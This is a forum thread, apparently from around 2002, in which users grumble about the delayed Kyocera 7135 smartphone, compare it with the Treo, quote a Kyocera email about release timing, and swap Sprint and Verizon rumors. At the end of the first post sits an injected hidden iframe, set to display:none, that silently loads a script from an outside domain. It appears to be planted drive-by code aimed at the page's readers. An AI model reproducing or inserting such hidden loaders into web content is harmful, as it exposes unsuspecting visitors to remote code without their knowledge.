Ok, so Sprint slipped the I330 in the market with not many people even noticing, or caring. Maybe they could have stirred up some action had that release been the Bluechip, but no. So we wait, wonder and discuss things to come. I hear things of Beta testing and bugs with the 7135, but KYO... comon.. its time, release the phone. Sure you gotta test, gotta get carriers... but give us SOME INFO.. a date, carriers, something... these opinions and tid bits of info from all over concerning a release date are appreciated... but I think we are all ready for something concrete!! just my opinion <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Im becoming exhausted from waiting for the 7135--all my patience has been zapped by this forum--i got into such a fever pitch, and now i cant sustain the over-the-top enthusiasm i held for six solid weeks. Now i wonder if it ever will come out, maybe its just a prototype test, but not a real product, like car manufacturers do.
I wish Kyocera was more like Samsung, where multitudes of things slip out of them faster than you can keep track of.
You can't deny that the 7135 will hands down be the best smartphone when it releases. This forum is a double edged sword. You get great info but the anticipation is killing me.
Most of this board have had really good luck with their 6035 but I've replaced mine 3 times and am barely hanging on.
Deep down I know that the longer I wait the better product I will receive when i do get it but enough is enough.
How can you say the 7135 will be the "hands down be the best smartphone?"
Don't you want to wait and see it in production form first? According to some notes on this list, it seems that Kyocera may be having problem, which might explain the '03 rumors. I think all the pent up demand may be blinding us.
One wonders what they are doing, considering that the Treo has been out for months. One wonders if we'll see the Treo '400' before the Kyo 7135!

Well, that's easy. By comparing the specs for the 7135 to the specs of competing smartphones.
There is no reason to suspect that Kyocera's smartphones will always be the hands-down best smartphone, but, assuming the 7135 is released soon, its going to be the best thing out there for the near term.
While it is common to get excited about 'SPECS', day to day usability is much more important. An SD slot and an MP3 player isn't worth a hill of beans if you don't need them. Personally, I would rather have the unit be a quarter inch thinner, with less features.
The Kyo 6035 has some serious user interface problems in my opinion. The Treo is much easier to use on a day to day basis (but still not perfect).
So, while I too will probably get a Kyo 7135, partly due to the fact that Verizon is the only decent carrier in my area, I am going to be very dissapointed if the user interface has not improved.
Kyocera told me in an e-mail, that they expect to release the 7135in late November to early December, here's word for word what they told me...
"Thank you for your interest in Kyocera Wireless Corp. CDMA digital wireless products.
The Kyocera 7135 is expected to be available in late November, early December.
Kyocera Wireless phones are available to consumers through authorized CDMA digital cellular and PCS service providers. Because the service providers implement the networks, they have current information regarding product and service availability, service plans, coverage areas, activation and other services offered. They also set their own final retail prices."

I say we put a gag order on the whole thing and don't release any more rumors or tip offs until it is officially released.
I'm more than half serious.
Wadayasay?
I personally don't even pay attention anymore.... at least to Verizon rumors, since there has been a zillion of them. But there are hardly any Sprint rumors... I wonder why nobody has any "reliable sources" at Sprint?
I have a Sprint business account rep that returned my call last week, and she wants to come out to visit, but I haven't had time to bother with it yet. Maybe she knows something? I might at least call her today.

Robert, call her! With this rumor of $10/unlimited data for Sprint, I am having serious doubts about switching to Verizon to snag the 7135 as soon as it's available. Call her and lets get some Sprint rumors going!
